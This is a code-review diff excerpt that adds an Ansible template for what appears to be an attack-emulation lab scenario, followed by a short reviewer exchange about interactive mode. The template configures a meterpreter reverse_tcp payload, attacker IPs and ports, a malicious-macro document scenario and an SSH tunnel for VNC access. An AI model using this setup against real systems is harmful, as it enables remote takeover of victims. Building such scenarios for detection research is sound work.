ansible/run/scenario6/templates/scenario_6_a_a.j2

```diff
@@ -0,0 +1,258 @@
+# Client opens an Open Office Document with a macro that download and executes payload
+# persistence via browser binary
+
+vars:
+  PAYLOAD: linux/x64/meterpreter/reverse_tcp
+  LPORT: 4443
+  ATTACKMATE_IP: 192.42.1.174
+  CLIENT_IP: 192.168.50.100
+  MGMT_IP: 192.42.0.201
+  MGMT_USERNAME: aecid
+  CLIENT_VNC_PORT: 5900
+  ATTACKER_VNC_PORT: 5901
+  RUSTDESK_PACKAGE: https://github.com/rustdesk/rustdesk/releases/download/1.3.8/rustdesk-1.3.8-x86_64.deb
+
+
+commands:
+  # establish ssh tunneling via mgmt host, everything sent to attacker port 5902 will be forwarded to client port 5901 (vnc)
+  # ssh -i /home/aecid/.ssh/attacker -o StrictHostKeyChecking=no -L 5902:192.168.50.100:5901 aecid@192.42.0.201
+
+
+##################### SSH TUNNEL VIA MGMT HOST ############################
+
+  - type: shell
+    interactive: true
```

Comment:
I can imagine that you might want to have this command running in background instead of using the interactive-mode

Reply:
true, but background is not implmented for ssh